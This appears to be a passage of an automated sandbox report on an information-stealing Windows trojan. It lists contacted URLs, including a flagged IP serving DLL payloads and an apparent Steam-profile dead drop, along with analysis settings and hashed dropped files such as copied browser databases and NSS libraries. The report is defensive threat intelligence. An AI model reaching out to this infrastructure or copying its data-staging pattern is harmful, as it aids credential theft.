                    https://95.217.240.101/ORegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://store.steampowered.com/legal/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=L3Ed_Gybseku&l=eRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.sqlite.org/copyright.html.RegAsm.exe, 00000002.00000002.2647482481.000000001B6CD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101KEGRegAsm.exe, 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=soQOTmUzRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoHIEBAK.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaRegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=HIEBAK.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101/sqlx.dllIRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgRegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=englishRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101/msvcp140.dllyS#RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/mobileRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    104.102.42.29
                    		steamcommunity.comUnited States
                    		16625AKAMAI-ASUStrue
                    95.217.240.101
                    		unknownGermany
                    		24940HETZNER-ASDEfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1443407
                    Start date and time:2024-05-17 18:05:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 1s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@9/27@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • TCP Packets have been reduced to 100
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    12:06:06API Interceptor1x Sleep call for process: RegAsm.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\FCGCGDHJEGHJ\DAKJDA

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):159744
                    Entropy (8bit):0.5394293526345721
                    Encrypted:false
                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\DHDHJJ

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                    Category:dropped
                    Size (bytes):20480
                    Entropy (8bit):0.8439810553697228
                    Encrypted:false
                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\EBGCBA

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                    Category:dropped
                    Size (bytes):20480
                    Entropy (8bit):0.6732424250451717
                    Encrypted:false
                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\EBKJDB

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):155648
                    Entropy (8bit):0.5407252242845243
                    Encrypted:false
                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                    MD5:7B955D976803304F2C0505431A0CF1CF
                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                    Malicious:false
                    Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\FCGCGD

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\GCGDGH

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                    Category:dropped
                    Size (bytes):9504
                    Entropy (8bit):5.512408163813622
                    Encrypted:false
                    SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                    MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                    SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                    SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                    SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                    Malicious:false
                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                    C:\ProgramData\FCGCGDHJEGHJ\HDGIJJ

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\HIEBAK

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\JDGCGD

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\KJKJJJ

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):5242880
                    Entropy (8bit):0.03859996294213402
                    Encrypted:false
                    SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                    MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                    SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                    SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                    SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                    Malicious:false
                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\KJKJJJ-shm

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):32768
                    Entropy (8bit):0.017262956703125623
                    Encrypted:false
                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                    Malicious:false
                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\KKJEBA

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):98304
                    Entropy (8bit):0.08235737944063153
                    Encrypted:false
                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\KKJEBA-shm

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):32768
                    Entropy (8bit):0.017262956703125623
                    Encrypted:false
                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                    Malicious:false
                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\freebl3.dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):685392
                    Entropy (8bit):6.872871740790978
                    Encrypted:false
                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                    MD5:550686C0EE48C386DFCB40199BD076AC
                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\mozglue.dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):608080
                    Entropy (8bit):6.833616094889818
                    Encrypted:false
                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\msvcp140.dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):450024
                    Entropy (8bit):6.673992339875127
                    Encrypted:false
                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                    C:\ProgramData\FCGCGDHJEGHJ\nss3.dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2046288
                    Entropy (8bit):6.787733948558952
                    Encrypted:false
                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
